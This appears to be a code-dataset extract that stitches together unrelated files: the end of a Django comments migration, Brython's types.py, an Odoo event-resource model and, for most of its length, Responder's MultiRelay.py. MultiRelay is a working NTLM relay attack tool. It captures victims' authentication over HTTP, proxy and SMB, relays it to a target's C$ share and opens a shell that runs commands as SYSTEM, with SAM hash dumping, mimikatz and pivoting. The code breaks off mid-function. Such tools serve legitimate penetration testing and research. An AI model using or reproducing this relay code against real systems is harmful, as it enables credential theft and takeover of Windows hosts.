# Adding unique constraint on 'CommentFlag', fields ['user', 'comment', 'flag']
db.create_unique('django_comment_flags', ['user_id', 'comment_id', 'flag'])
def backwards(self, orm):
# Removing unique constraint on 'CommentFlag', fields ['user', 'comment', 'flag']
db.delete_unique('django_comment_flags', ['user_id', 'comment_id', 'flag'])
# Deleting model 'Comment'
db.delete_table('django_comments')
# Deleting model 'CommentFlag'
db.delete_table('django_comment_flags')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
user_model_label: {
'Meta': {'object_name': User.__name__, 'db_table': "'{}'".format(User._meta.db_table)},
User._meta.pk.attname: ('django.db.models.fields.AutoField', [], {'primary_key': 'True', 'db_column': "'{}'".format(User._meta.pk.column)}),
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'django_comments.comment': {
'Meta': {'ordering': "('submit_date',)", 'object_name': 'Comment', 'db_table': "'django_comments'"},
'comment': ('django.db.models.fields.TextField', [], {'max_length': '3000'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_type_set_for_comment'", 'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True', 'blank': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_removed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'object_pk': ('django.db.models.fields.TextField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'submit_date': ('django.db.models.fields.DateTimeField', [], {'default': 'None'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comment_comments'", 'null': 'True', 'to': u"orm['{}']".format(user_orm_label)}),
'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'user_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'user_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
u'django_comments.commentflag': {
'Meta': {'unique_together': "[('user', 'comment', 'flag')]", 'object_name': 'CommentFlag', 'db_table': "'django_comment_flags'"},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'flags'", 'to': u"orm['django_comments.Comment']"}),
'flag': ('django.db.models.fields.CharField', [], {'max_length': '30', 'db_index': 'True'}),
'flag_date': ('django.db.models.fields.DateTimeField', [], {'default': 'None'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'comment_flags'", 'to': u"orm['{}']".format(user_orm_label)})
},
u'sites.site': {
'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['django_comments']
| mit | -642,275,514,966,809,700 | 67.196581 | 187 | 0.584785 | false |
40223250/2015cd_midterm- | static/Brython3.1.1-20150328-091302/Lib/types.py | 756 | 3167 | """
Define names for built-in types that aren't directly accessible as a builtin.
"""
import sys
# Iterators in Python aren't a matter of type but of protocol. A large
# and changing number of builtin types implement *some* flavor of
# iterator. Don't check the type! Use hasattr to check for both
# "__iter__" and "__next__" attributes instead.
def _f(): pass
FunctionType = type(_f)
LambdaType = type(lambda: None) # Same as FunctionType
CodeType = type(_f.__code__)
MappingProxyType = type(type.__dict__)
SimpleNamespace = type(sys.implementation)
def _g():
yield 1
GeneratorType = type(_g())
class _C:
def _m(self): pass
MethodType = type(_C()._m)
BuiltinFunctionType = type(len)
BuiltinMethodType = type([].append) # Same as BuiltinFunctionType
ModuleType = type(sys)
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
TracebackType = type(tb)
FrameType = type(tb.tb_frame)
tb = None; del tb
# For Jython, the following two types are identical
GetSetDescriptorType = type(FunctionType.__code__)
MemberDescriptorType = type(FunctionType.__globals__)
del sys, _f, _g, _C, # Not for export
# Provide a PEP 3115 compliant mechanism for class creation
def new_class(name, bases=(), kwds=None, exec_body=None):
"""Create a class object dynamically using the appropriate metaclass."""
meta, ns, kwds = prepare_class(name, bases, kwds)
if exec_body is not None:
exec_body(ns)
return meta(name, bases, ns, **kwds)
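# A minimal illustration: build a class equivalent to ``class Point: x = 0; y = 0``
# without a class statement.
#
#   Point = new_class("Point", (), exec_body=lambda ns: ns.update(x=0, y=0))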
def prepare_class(name, bases=(), kwds=None):
"""Call the __prepare__ method of the appropriate metaclass.
Returns (metaclass, namespace, kwds) as a 3-tuple
*metaclass* is the appropriate metaclass
*namespace* is the prepared class namespace
*kwds* is an updated copy of the passed in kwds argument with any
'metaclass' entry removed. If no kwds argument is passed in, this will
be an empty dict.
"""
if kwds is None:
kwds = {}
else:
kwds = dict(kwds) # Don't alter the provided mapping
if 'metaclass' in kwds:
meta = kwds.pop('metaclass')
else:
if bases:
meta = type(bases[0])
else:
meta = type
if isinstance(meta, type):
# when meta is a type, we first determine the most-derived metaclass
# instead of invoking the initial candidate directly
meta = _calculate_meta(meta, bases)
if hasattr(meta, '__prepare__'):
ns = meta.__prepare__(name, bases, **kwds)
else:
ns = {}
return meta, ns, kwds
def _calculate_meta(meta, bases):
"""Calculate the most derived metaclass."""
winner = meta
for base in bases:
base_meta = type(base)
if issubclass(winner, base_meta):
continue
if issubclass(base_meta, winner):
winner = base_meta
continue
# else:
raise TypeError("metaclass conflict: "
"the metaclass of a derived class "
"must be a (non-strict) subclass "
"of the metaclasses of all its bases")
return winner
| gpl-3.0 | 2,450,574,333,059,934,000 | 30.356436 | 77 | 0.628671 | false |
ClearCorp/odoo-clearcorp | TODO-9.0/project_event/resource.py | 3 | 2336 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Addons modules by CLEARCORP S.A.
# Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api
class Resource(models.Model):
    _name = 'project.event.resource'
_inherits = {'resource.resource': 'resource_id'}
@api.onchange('resource_type')
def onchange_resource_type(self):
self.unlimited = False
@api.multi
def name_get(self):
result = []
for resource in self:
if resource.code:
result.append((resource.id, "[%s] - %s" % (resource.code, resource.name or '')))
else:
result.append((resource.id, "%s" % resource.name or ''))
return result
@api.model
def name_search(self, name, args=None, operator='ilike', limit=100):
args = args or []
recs = self.browse()
if name:
recs = self.search([('code', operator, name)] + args, limit=limit)
if not recs:
recs = self.search([('name', operator, name)] + args, limit=limit)
return recs.name_get()
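    # Behaviour sketch with hypothetical records: for a resource coded 'PRJ-01'
    # named 'Projector', name_search('PRJ') matches on the code first and
    # name_get() renders it as '[PRJ-01] - Projector'; a term matching no code
    # falls back to searching the name field.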
unlimited = fields.Boolean('Unlimited', help='This resource is able to '
'be scheduled in many events at the same time')
category_id = fields.Many2one('project.event.resource.category', string='Category')
resource_id = fields.Many2one('resource.resource', string='Resource',
ondelete='cascade', required=True) | agpl-3.0 | -7,036,138,707,060,302,000 | 39.293103 | 96 | 0.601884 | false |
lgandx/Responder | tools/MultiRelay.py | 1 | 39626 | #!/usr/bin/env python
# -*- coding: latin-1 -*-
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: [email protected]
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
if (sys.version_info > (3, 0)):
PY2OR3 = "PY3"
else:
PY2OR3 = "PY2"
sys.exit("For now MultiRelay only supports python 3. Try python3 MultiRelay.py ...")
import re
import os
import logging
import optparse
import time
import random
import subprocess
from threading import Thread
if PY2OR3 == "PY3":
from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
else:
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
try:
from Crypto.Hash import MD5
except ImportError:
print("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.")
print("You can install it on debian based os with this command: apt-get install python-crypto")
print("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n")
try:
import readline
except:
print("Warning: readline module is not available, you will not be able to use the arrow keys for command history")
pass
from MultiRelay.RelayMultiPackets import *
from MultiRelay.RelayMultiCore import *
from SMBFinger.Finger import RunFinger,ShowSigning,RunPivotScan
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../')))
from socket import *
__version__ = "2.5"
MimikatzFilename = "./MultiRelay/bin/mimikatz.exe"
Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe"
RunAsFileName = "./MultiRelay/bin/Runas.exe"
SysSVCFileName = "./MultiRelay/bin/Syssvc.exe"
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
if os.path.isfile(SysSVCFileName) is False:
print(color("[!]MultiRelay/bin/ folder is empty. You need to run these commands:\n",1,1))
print(color("apt-get install gcc-mingw-w64-x86-64",2,1))
print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv",2,1))
print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode",2,1))
print(color("\nAdditionally, you can add your custom mimikatz executables (mimikatz.exe and mimikatz_x86.exe)\nin the MultiRelay/bin/ folder for the mimi32/mimi command.",3,1))
sys.exit()
def UserCallBack(op, value, dmy, parser):
args=[]
for arg in parser.rargs:
if arg[0] != "-":
args.append(arg)
if arg[0] == "-":
break
if getattr(parser.values, op.dest):
args.extend(getattr(parser.values, op.dest))
setattr(parser.values, op.dest, args)
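# Illustrative example of the callback above (values are placeholders): with
# "-u Administrator lgandx admin -t 10.0.0.5" on the command line, the loop
# collects ['Administrator', 'lgandx', 'admin'] and stops at the next "-"
# option, so UserToRelay ends up holding those three usernames.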
parser = optparse.OptionParser(usage="\npython %prog -t 10.20.30.40 -u Administrator lgandx admin\npython %prog -t 10.20.30.40 -u ALL", version=__version__, prog=sys.argv[0])
parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
parser.add_option('-p',action="store", help="Additional port to listen on, this will relay for proxy, http and webdav incoming packets.",metavar="8081",dest="ExtraPort")
parser.add_option('-u', '--UserToRelay', help="Users to relay. Use '-u ALL' to relay all users.", action="callback", callback=UserCallBack, dest="UserToRelay")
parser.add_option('-c', '--command', action="store", help="Single command to run (scripting)", metavar="whoami",dest="OneCommand")
parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (scripting)", metavar="whoami",dest="Dump")
options, args = parser.parse_args()
if options.TARGET is None:
print("\n-t Mandatory option is missing, please provide a target.\n")
parser.print_help()
exit(-1)
if options.UserToRelay is None:
print("\n-u Mandatory option is missing, please provide a username to relay.\n")
parser.print_help()
exit(-1)
if options.ExtraPort is None:
options.ExtraPort = 0
if not os.geteuid() == 0:
print(color("[!] MultiRelay must be run as root."))
sys.exit(-1)
OneCommand = options.OneCommand
Dump = options.Dump
ExtraPort = options.ExtraPort
UserToRelay = options.UserToRelay
Host = [options.TARGET]
Cmd = []
ShellOpen = []
Pivoting = [2]
def ShowWelcome():
print(color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1))
print('\nSend bugs/hugs/comments to: [email protected]')
print('Usernames to relay (-u) are case sensitive.')
print('To kill this script hit CTRL-C.\n')
print(color('/*',8,1))
print('Use this script in combination with Responder.py for best results.')
print('Make sure to set SMB and HTTP to OFF in Responder.conf.\n')
	print('This tool listens on TCP ports 80, 3128 and 445.')
print('For optimal pwnage, launch Responder only with these 2 options:')
print('-rv\nAvoid running a command that will likely prompt for information like net use, etc.')
print('If you do so, use taskkill (as system) to kill the process.')
print(color('*/',8,1))
print(color('\nRelaying credentials for these users:',8,1))
print(color(UserToRelay,4,1))
print('\n')
ShowWelcome()
def ShowHelp():
print(color('Available commands:',8,0))
print(color('dump',8,1)+' -> Extract the SAM database and print hashes.')
print(color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)')
print(color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)')
print(color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)')
print(color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)')
print(color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\')
print(color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)')
print(color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to')
print(color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)')
	print(color('mimi command',8,1)+' -> Run a remote Mimikatz 64-bit command (eg: mimi coffee)')
	print(color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32-bit command (eg: mimi32 coffee)')
print(color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)')
print(color('help',8,1)+' -> Print this message.')
print(color('exit',8,1)+' -> Exit this shell and return in relay mode.')
print(' If you want to quit type exit and then use CTRL-C\n')
print(color('Any other command than that will be run as SYSTEM on the target.\n',8,1))
Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../"
Logs = logging
Logs.basicConfig(filemode="w",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
def NetworkSendBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return bytes(str(data), 'latin-1')
def NetworkRecvBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return str(data.decode('latin-1'))
def StructPython2or3(endian,data):
#Python2...
if PY2OR3 == "PY2":
return struct.pack(endian, len(data))
#Python3...
else:
return struct.pack(endian, len(data)).decode('latin-1')
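# Minimal sketch of how the helpers above are combined when sending SMB over
# TCP (placeholder values, not a real packet): a 4-byte big-endian length
# prefix is prepended to the assembled packet before it goes on the wire.
#
#   packet = str(header) + str(body)                    # latin-1 string
#   buffer = StructPython2or3('>i', packet) + packet    # length-prefixed
#   s.send(NetworkSendBufferPython2or3(buffer))         # bytes under Python 3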
def UploadContent(File):
with open(File,'rb') as f:
s = f.read()
FileLen = len(s.decode('latin-1'))
FileContent = s.decode('latin-1')
return FileLen, FileContent
try:
RunFinger(Host[0])
except:
	print("The host %s seems to be down or port 445 down."%(Host[0]))
	raise
def get_command():
global Cmd
Cmd = []
while any(x in Cmd for x in Cmd) is False:
Cmd = [input("C:\\Windows\\system32\\:#")]
#Function used to make sure no connections are accepted while we have an open shell.
#Used to avoid any possible broken pipe.
def IsShellOpen():
#While there's nothing in our array return false.
if any(x in ShellOpen for x in ShellOpen) is False:
return False
#If there is return True.
else:
return True
#Function used to make sure no connections are accepted on HTTP and HTTP_Proxy while we are pivoting.
def IsPivotOn():
#While there's nothing in our array return false.
if Pivoting[0] == "2":
return False
#If there is return True.
if Pivoting[0] == "1":
print("pivot is on")
return True
def ConnectToTarget():
try:
s = socket(AF_INET, SOCK_STREAM)
s.connect((Host[0],445))
return s
except:
try:
			print("Cannot connect to target, host down?")
			sys.exit(1)
except:
pass
class HTTPProxyRelay(BaseRequestHandler):
def handle(self):
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
return None
if IsPivotOn():
return None
except:
raise
s = ConnectToTarget()
try:
data = self.request.recv(8092)
##First we check if it's a Webdav OPTION request.
Webdav = ServeOPTIONS(data)
if Webdav:
				#If it is, send the OPTIONS answer; we'll send the client to auth when we receive a PROPFIND.
self.request.send(Webdav)
data = self.request.recv(4096)
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(2048) #got it here.
## Send HTTP Proxy
Buffer_Ans = WPAD_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth):
Response = WPAD_Auth_407_Ans()
self.request.send(str(Response))
data = self.request.recv(8092)
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
#and has not attempted before. While at it, let's grab his hash.
Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
if Username is not None:
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print("[+] SMB Session Auth sent.")
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None:
s.close()
self.request.close()
return None
else:
##Any other type of request, send a 407.
Response = WPAD_Auth_407_Ans()
self.request.send(str(Response))
except Exception:
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
class HTTPRelay(BaseRequestHandler):
def handle(self):
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
return None
if IsPivotOn():
return None
except:
raise
try:
s = ConnectToTarget()
data = self.request.recv(8092)
##First we check if it's a Webdav OPTION request.
Webdav = ServeOPTIONS(data)
if Webdav:
				#If it is, send the OPTIONS answer; we'll send the client to auth when we receive a PROPFIND.
self.request.send(NetworkSendBufferPython2or3(Webdav))
data = self.request.recv(4096)
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(2048) #got it here.
## Send HTTP Response.
Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth):
Response = IIS_Auth_401_Ans()
self.request.send(str(Response))
data = self.request.recv(8092)
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
#and has not attempted before. While at it, let's grab his hash.
Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
if Username is not None:
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print("[+] SMB Session Auth sent.")
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None:
s.close()
self.request.close()
return None
else:
##Any other type of request, send a 401.
Response = IIS_Auth_401_Ans()
self.request.send(str(Response))
except Exception:
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
class SMBRelay(BaseRequestHandler):
def handle(self):
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
return None
except:
raise
try:
s = ConnectToTarget()
data = self.request.recv(8092)
##Negotiate proto answer. That's us.
if data[8:10] == b'\x72\x00':
Header = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x43\xc8", pid=pidcalc(data),mid=midcalc(data))
Body = SMBRelayNegoAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)))
packet1 = str(Header)+str(Body)
Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(4096)
## Make sure it's not a Kerberos auth.
if data.find(b'NTLM') != -1:
## Start with nego protocol + session setup negotiate to our target.
data, smbdata, s, challenge = GrabNegotiateFromTarget(data, s, Pivoting)
## Make sure it's not a Kerberos auth.
if data.find(b'NTLM') != -1:
##Relay all that to our client.
if data[8:10] == b'\x73\x00':
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
#NTLMv2 MIC calculation is a concat of all 3 NTLM (nego,challenge,auth) messages exchange.
#Then simply grab the whole session setup packet except the smb header from the client and pass it to the server.
t = smbdata[36:].decode('latin-1')
packet0 = str(head)+str(t)
buffer0 = longueur(packet0)+packet0
self.request.send(NetworkSendBufferPython2or3(buffer0))
data = self.request.recv(4096)
else:
#if it's kerberos, ditch the connection.
s.close()
return None
if IsSMBAnonymous(NetworkSendBufferPython2or3(data)):
##Send logon failure for anonymous logins.
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
t = SMBSessEmpty()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
self.request.send(NetworkSendBufferPython2or3(buffer1))
s.close()
return None
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
#and has not attempted before. While at it, let's grab his hash.
Username, Domain = ParseSMBHash(data,self.client_address[0],challenge,UserToRelay,Host[0],Pivoting)
if Username is not None:
##Got the ntlm message 3, send it over to SMB.
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34].decode('latin-1'),mid="\x03\x00")
t = data[36:].decode('latin-1')#Final relay.
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
if Pivoting[0] == "1":
pass
else:
print("[+] SMB Session Auth sent.")
s.send(NetworkSendBufferPython2or3(buffer1))
smbdata = s.recv(4096)
#We're all set, dropping into shell.
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
#If runcmd is None it's because tree connect was denied for this user.
#This will only happen once with that specific user account.
#Let's kill that connection so we can force him to reauth with another account.
if RunCmd is None:
s.close()
return None
else:
##Send logon failure, so our client might authenticate with another account.
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
t = SMBSessEmpty()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
self.request.send(NetworkSendBufferPython2or3(buffer1))
data = self.request.recv(4096)
self.request.close()
return None
except Exception:
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
#Interface starts here.
def RunShellCmd(data, s, clientIP, Target, Username, Domain):
#Let's declare our globals here..
#Pivoting gets used when the pivot cmd is used, it let us figure out in which mode is MultiRelay. Initial Relay or Pivot mode.
global Pivoting
#Update Host, when pivoting is used.
global Host
#Make sure we don't open 2 shell at the same time..
global ShellOpen
ShellOpen = ["Shell is open"]
# On this block we do some verifications before dropping the user into the shell.
if data[8:10] == b'\x73\x6d':
print("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.")
print("[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
if data[8:10] == b'\x73\x8d':
print("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
if data[8:10] == b'\x73\x5e':
print("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n")
del ShellOpen[:]
return False
## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$:
## Tree Connect
if data[8:10] == b'\x73\x00':
GetSessionResponseFlags(data)#While at it, verify if the target has returned a guest session.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x43\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\C$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## Nope he doesn't.
if data[8:10] == b'\x75\x22':
if Pivoting[0] == "1":
pass
else:
print("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
# This one should not happen since we always use the IP address of the target in our tree connects, but just in case..
if data[8:10] == b'\x75\xcc':
print("[+] Tree Connect AndX denied. Bad Network Name returned.")
del ShellOpen[:]
return False
## Tree Connect on C$ is successfull.
if data[8:10] == b'\x75\x00':
